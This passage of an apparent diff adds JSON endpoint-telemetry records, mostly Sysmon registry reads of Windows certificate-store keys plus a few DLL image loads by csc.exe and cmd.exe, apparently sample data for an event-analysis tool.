"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + 
"pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\SysWOW64\\version.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 